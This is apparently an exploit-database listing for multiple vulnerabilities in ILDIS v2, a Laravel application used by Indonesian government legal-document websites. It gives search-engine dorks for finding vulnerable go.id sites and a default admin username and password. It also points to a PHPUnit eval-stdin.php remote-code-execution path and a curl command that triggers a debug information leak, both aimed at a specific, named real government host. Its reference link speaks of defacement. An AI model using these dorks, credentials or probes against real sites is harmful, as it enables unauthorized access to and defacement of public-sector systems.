ILDIS v2 Applications Multiple Vulnerabilities

2021.05.04
id KimiHmei7 (ID) id
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title : Ildis v2 Applications Multiple Vulnerabilities # Vendor Homepage : http://jdihn.go.id # Discovered By: KimiHmei7 # Author Homepage: https://tegalsec.org https://draxploit.web.id # Framework: Laravel # Google Dork: "ILDIS" site:go.id inurl:?tipe_dokumen= site:go.id inurl:/data_dokumen site:go.id intitle:Signin | ILDIS JDIHN # Vulnerabilities 1. Default Login https://site.go.id/login admin | admin123 2. PHPUnit Remote Code Execution http://jdih.dprd.belitung.go.id//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php (blank, maybe vuln but can't get RCE access. other sites using same path) 3. Laravel Debug Missconfiguration / information disclosure $ curl -d 1=1 http://jdih.dprd.belitung.go.id/ Thanks to DragonXploiter (Haikal)

References:

https://www.draxploit.web.id/2021/01/deface-ildis-v2-information.html?m=1


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top